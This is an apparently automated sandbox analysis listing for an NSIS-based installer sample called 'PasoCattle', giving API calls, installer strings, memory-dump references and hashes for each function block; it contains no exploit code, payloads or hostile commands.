                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                          Strings
                                                                                                                                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                          • `G, xrefs: 0040246E
                                                                                                                                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                          • API String ID: 1033533793-4193110038
                                                                                                                                                                          • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                          • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                          • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                          • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                          • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                          • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                          • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                          • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                            • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                            • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                          Strings
                                                                                                                                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                          • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                          • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                          • API String ID: 2014279497-3433828417
                                                                                                                                                                          • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                          • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                          • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                          • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                          • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                          • String ID: f
                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                          • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                          • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                          • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                          • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                          • MulDiv.KERNEL32(00012C00,00000064,00103847), ref: 00403295
                                                                                                                                                                          • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                          Strings
                                                                                                                                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                          • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                          • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                          • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                          • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                          • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                          • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                          • String ID: *?|<>/":
                                                                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                                                                          • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                          • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                          • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                          • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                          • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                          • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                          • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                          • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                          • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                          • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                          • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                          • String ID: !
                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                          • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                          • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                          • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                          • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                          • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                          • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                          • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                          • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                          • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
